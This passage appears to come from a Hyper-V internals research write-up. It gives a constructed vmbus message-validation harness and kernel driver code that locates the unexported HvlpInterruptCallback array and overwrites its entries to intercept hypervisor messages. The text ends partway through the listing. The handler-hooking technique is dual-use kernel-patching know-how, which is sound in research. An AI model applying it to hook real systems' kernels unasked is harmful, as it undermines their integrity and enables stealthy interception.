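<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The checks just described are exactly what a fuzzing or review harness for this code path needs to reproduce, so here is a worked version: it reads a 256-byte HV_MESSAGE as it sits in a SIM slot, extracts the vmbus channel message header, applies the type-range, sender and minimum-body-size checks, and walks the OFFERCHANNEL / GPADL_HEADER / GPADL_CREATED / OPENCHANNEL / OPENCHANNEL_RESULT exchange from the text as a state machine. This is an added example, not vmbusr.sys code. The HV_MESSAGE layout follows the TLFS; the channel message type numbers follow the LIS hyperv.h enumeration as I recall it (treat them as an assumption); the sender and minimum-size table is this example's own and is not vmbusr's, and the messages built for the test are constructed.</span></div>

```c
/* vmbus channel message validation over an HV_MESSAGE from a SIM slot,
 * modelled on the checks the text attributes to ChReceiveChannelMessage and
 * ChpValidateMessage. Added example, not vmbusr.sys code. Type numbers are
 * assumed from LIS hyperv.h; the rule table below is constructed. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define STATUS_SUCCESS            0x00000000u
#define STATUS_INVALID_PARAMETER  0xC000000Du
#define STATUS_ACCESS_DENIED      0xC0000022u   /* this example's code for a wrong sender */

#define HV_MESSAGE_PAYLOAD_BYTES  240
#define HV_MESSAGE_TYPE_NONE      0u

/* TLFS HV_MESSAGE: 16-byte header + 240-byte payload = one 256-byte SIM slot */
typedef struct {
    uint32_t message_type;      /* HvMessageTypeNone means the slot is empty */
    uint8_t  payload_size;      /* payload bytes in use */
    uint8_t  message_flags;     /* bit 0: MessagePending */
    uint16_t reserved;
    uint64_t sender;            /* partition id or port id of the sender */
    uint8_t  payload[HV_MESSAGE_PAYLOAD_BYTES];
} hv_message_t;

/* Channel message types (LIS); 0x12 is the last code the text says is accepted */
enum {
    CHANNELMSG_INVALID = 0, CHANNELMSG_OFFERCHANNEL = 1, CHANNELMSG_RESCIND_CHANNELOFFER = 2,
    CHANNELMSG_REQUESTOFFERS = 3, CHANNELMSG_ALLOFFERS_DELIVERED = 4, CHANNELMSG_OPENCHANNEL = 5,
    CHANNELMSG_OPENCHANNEL_RESULT = 6, CHANNELMSG_CLOSECHANNEL = 7, CHANNELMSG_GPADL_HEADER = 8,
    CHANNELMSG_GPADL_BODY = 9, CHANNELMSG_GPADL_CREATED = 10, CHANNELMSG_GPADL_TEARDOWN = 11,
    CHANNELMSG_GPADL_TORNDOWN = 12, CHANNELMSG_RELID_RELEASED = 13, CHANNELMSG_INITIATE_CONTACT = 14,
    CHANNELMSG_VERSION_RESPONSE = 15, CHANNELMSG_UNLOAD = 16, CHANNELMSG_UNLOAD_RESPONSE = 17,
    CHANNELMSG_MAX_VALID = 0x12
};

/* Every channel message starts with this 8-byte header (LIS) */
typedef struct { uint32_t msgtype; uint32_t padding; } vmbus_channel_message_header_t;

typedef enum { SENDER_GUEST = 0, SENDER_ROOT = 1 } vmbus_sender_t;

/* Constructed rule table: which side may send each type and the minimum body
 * size after the header. Types not listed (e.g. 0x12) get {0,0,0}: no sender
 * is accepted, so they fail the sender check rather than the range check. */
typedef struct { uint8_t guest_ok, root_ok, min_body; } msg_rule_t;
static const msg_rule_t rules[CHANNELMSG_MAX_VALID + 1] = {
    [CHANNELMSG_OFFERCHANNEL]         = {0, 1, 16}, [CHANNELMSG_RESCIND_CHANNELOFFER] = {0, 1, 4},
    [CHANNELMSG_REQUESTOFFERS]        = {1, 0, 0},  [CHANNELMSG_ALLOFFERS_DELIVERED]  = {0, 1, 0},
    [CHANNELMSG_OPENCHANNEL]          = {1, 0, 20}, [CHANNELMSG_OPENCHANNEL_RESULT]   = {0, 1, 12},
    [CHANNELMSG_CLOSECHANNEL]         = {1, 0, 4},  [CHANNELMSG_GPADL_HEADER]         = {1, 0, 8},
    [CHANNELMSG_GPADL_BODY]           = {1, 0, 8},  [CHANNELMSG_GPADL_CREATED]        = {0, 1, 12},
    [CHANNELMSG_GPADL_TEARDOWN]       = {1, 0, 8},  [CHANNELMSG_GPADL_TORNDOWN]       = {0, 1, 4},
    [CHANNELMSG_RELID_RELEASED]       = {1, 0, 4},  [CHANNELMSG_INITIATE_CONTACT]     = {1, 0, 16},
    [CHANNELMSG_VERSION_RESPONSE]     = {0, 1, 4},  [CHANNELMSG_UNLOAD]               = {1, 0, 0},
    [CHANNELMSG_UNLOAD_RESPONSE]      = {0, 1, 0},
};

/* Range check first (the 0 / > 0x12 test from the text), then sender, then size */
uint32_t vmbus_validate_message(const hv_message_t *m, vmbus_sender_t sender, uint32_t *msgtype_out)
{
    vmbus_channel_message_header_t hdr;
    if (m->message_type == HV_MESSAGE_TYPE_NONE) return STATUS_INVALID_PARAMETER;   /* empty slot */
    if (m->payload_size < sizeof hdr || m->payload_size > HV_MESSAGE_PAYLOAD_BYTES)
        return STATUS_INVALID_PARAMETER;                       /* header must fit before we read it */
    memcpy(&hdr, m->payload, sizeof hdr);
    if (hdr.msgtype == CHANNELMSG_INVALID || hdr.msgtype > CHANNELMSG_MAX_VALID)
        return STATUS_INVALID_PARAMETER;
    const msg_rule_t *r = &rules[hdr.msgtype];
    if (!(sender == SENDER_ROOT ? r->root_ok : r->guest_ok)) return STATUS_ACCESS_DENIED;
    if ((size_t)m->payload_size < sizeof hdr + r->min_body) return STATUS_INVALID_PARAMETER;
    *msgtype_out = hdr.msgtype;
    return STATUS_SUCCESS;
}

/* Build a constructed SIM-slot message: header + body_len zero bytes (body_len <= 232) */
void build_channel_message(hv_message_t *m, uint32_t msgtype, unsigned body_len)
{
    vmbus_channel_message_header_t hdr = { msgtype, 0 };
    if (body_len > HV_MESSAGE_PAYLOAD_BYTES - sizeof hdr) body_len = HV_MESSAGE_PAYLOAD_BYTES - sizeof hdr;
    memset(m, 0, sizeof *m);
    m->message_type = 1;                                      /* any non-None type */
    m->payload_size = (uint8_t)(sizeof hdr + body_len);
    memcpy(m->payload, &hdr, sizeof hdr);
}

/* The Guest Services open sequence from the text as a state machine.
 * Returns the next state, or -1 for an out-of-order or wrong-side message. */
enum { ST_IDLE, ST_OFFERED, ST_GPADL_REQUESTED, ST_GPADL_CREATED, ST_OPEN_REQUESTED, ST_OPEN };
int vmbus_open_step(int state, vmbus_sender_t sender, uint32_t msgtype)
{
    static const struct { int from; vmbus_sender_t who; uint32_t type; int to; } seq[] = {
        { ST_IDLE,            SENDER_ROOT,  CHANNELMSG_OFFERCHANNEL,       ST_OFFERED },
        { ST_OFFERED,         SENDER_GUEST, CHANNELMSG_GPADL_HEADER,       ST_GPADL_REQUESTED },
        { ST_GPADL_REQUESTED, SENDER_ROOT,  CHANNELMSG_GPADL_CREATED,      ST_GPADL_CREATED },
        { ST_GPADL_CREATED,   SENDER_GUEST, CHANNELMSG_OPENCHANNEL,        ST_OPEN_REQUESTED },
        { ST_OPEN_REQUESTED,  SENDER_ROOT,  CHANNELMSG_OPENCHANNEL_RESULT, ST_OPEN },
    };
    for (size_t i = 0; i < sizeof seq / sizeof seq[0]; i++)
        if (seq[i].from == state && seq[i].who == sender && seq[i].type == msgtype) return seq[i].to;
    return -1;
}
```

<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The order of the checks is the point: the header is only read after payload_size has been confirmed to cover it, and the per-type minimum size is applied after the sender check, so a guest cannot drive the root-only branches (OFFERCHANNEL, GPADL_CREATED, OPENCHANNEL_RESULT) no matter how well-formed the body is. When tracing the real driver, compare which of these checks ChpValidateMessage performs for each message code.</span></div>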
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's see which messages are exchanged between the root OS and the guest OS. To do this, we write a driver that replaces the entries of the HvlpInterruptCallback handler array in the root OS with its own handlers.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The driver was written in Visual Studio 2013. It must be loaded into the root OS, for example with OSRLoader. A simple program, SendIOCTL.exe, is used to send the IOCTL code. After it receives the INTERRUPT_CODE IOCTL, the driver starts processing the data the hypervisor sends to slot SIM0. Unfortunately the variable HvlpInterruptCallback, which holds the address of the array of message handler pointers, is not exported by the Windows kernel, so the driver has to locate it by analysing the code of the exported kernel function HvlRegisterInterruptCallback, which does reference the array. Also, simply calling HvlRegisterInterruptCallback to register your own message handler will not work: at its beginning the function checks the variable HvlpFlags, and if it equals 1 (the value assigned in the early stages of kernel initialization) the function stops and returns 0xC00000BB (STATUS_NOT_SUPPORTED). To register a handler correctly you therefore have to overwrite the entries of HvlpInterruptCallback with your own versions of the handlers. In the hyperv4 driver this is done by the RegisterInterrupt function.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The RegisterInterrupt function of the hyperv4 driver does the following:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">int</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> RegisterInterrupt()</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">UNICODE_STRING</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> uniName;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PVOID</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> pvHvlRegisterAddress = </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PHYSICAL_ADDRESS</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> pAdr = {0};</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ULONG</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> i,ProcessorCount;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We get the number of active processor cores</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ProcessorCount = KeQueryActiveProcessorCount(</span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">); </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">search for addresses of the exported function HvlRegisterInterruptCallback</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Active processor count"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,ProcessorCount);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">RtlInitUnicodeString(&uniName, L</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"HvlRegisterInterruptCallback"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pvHvlRegisterAddress = MmGetSystemRoutineAddress(&uniName);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (pvHvlRegisterAddress == </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Cannot find HvlRegisterInterruptCallback!"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">return</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog16</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"HvlRegisterInterruptCallback address "</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,pvHvlRegisterAddress);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">locate the address of the HvlpInterruptCallback variable, starting from the code of HvlRegisterInterruptCallback</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FindHvlpInterruptCallback((</span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">unsigned</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">char</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> *)pvHvlRegisterAddress);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">replace the original handlers with our own handlers, one call per callback index</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ArchmHvlRegisterInterruptCallback((</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&ArchmWinHvOnInterrupt, (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)pvHvlpInterruptCallbackOrig, </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WIN_HV_ON_INTERRUPT_INDEX</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ArchmHvlRegisterInterruptCallback((</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&ArchXPartEnlightenedIsr, (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)pvHvlpInterruptCallbackOrig, </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">XPART_ENLIGHTENED_ISR0_INDEX</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ArchmHvlRegisterInterruptCallback((</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&ArchXPartEnlightenedIsr, (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)pvHvlpInterruptCallbackOrig, </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">XPART_ENLIGHTENED_ISR1_INDEX</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ArchmHvlRegisterInterruptCallback((</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&ArchXPartEnlightenedIsr, (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)pvHvlpInterruptCallbackOrig, </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">XPART_ENLIGHTENED_ISR2_INDEX</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
